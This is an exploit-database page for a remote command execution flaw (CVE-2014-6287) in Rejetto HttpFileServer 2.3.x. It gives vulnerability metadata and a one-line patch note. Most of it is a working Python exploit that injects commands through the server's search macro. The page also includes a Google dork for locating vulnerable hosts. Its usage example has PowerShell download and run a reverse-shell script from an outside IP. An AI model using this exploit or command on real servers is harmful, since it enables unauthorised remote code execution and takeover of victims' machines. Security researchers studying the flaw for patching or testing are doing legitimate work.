Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)

vendor:

HttpFileServer

by:

Óscar Andreu

9.8

CVSS

CRITICAL

Remote Command Execution

CWE

Product Name: HttpFileServer

Affected Version From: 2.3.x

Affected Version To: 2.3.x

Patch Exists: YES

Related CWE: CVE-2014-6287

CPE: 2.3.x

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows Server 2008, Windows 8, Windows 7

2020

Rejetto HttpFileServer 2.3.x – Remote Command Execution (3)

Rejetto HttpFileServer 2.3.x is vulnerable to Remote Command Execution. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This request contains a malicious payload which is then executed on the server. This vulnerability was discovered by Óscar Andreu and is tracked as CVE-2014-6287.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.

Source

Exploit-DB raw data:

# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: Óscar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287

#!/usr/bin/python3

# Usage :  python3 Exploit.py <RHOST> <Target RPORT> <Command>
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"

import urllib3
import sys
import urllib.parse

try:
	http = urllib3.PoolManager()	
	url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
	print(url)
	response = http.request('GET', url)
	
except Exception as ex:
	print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
	print(ex)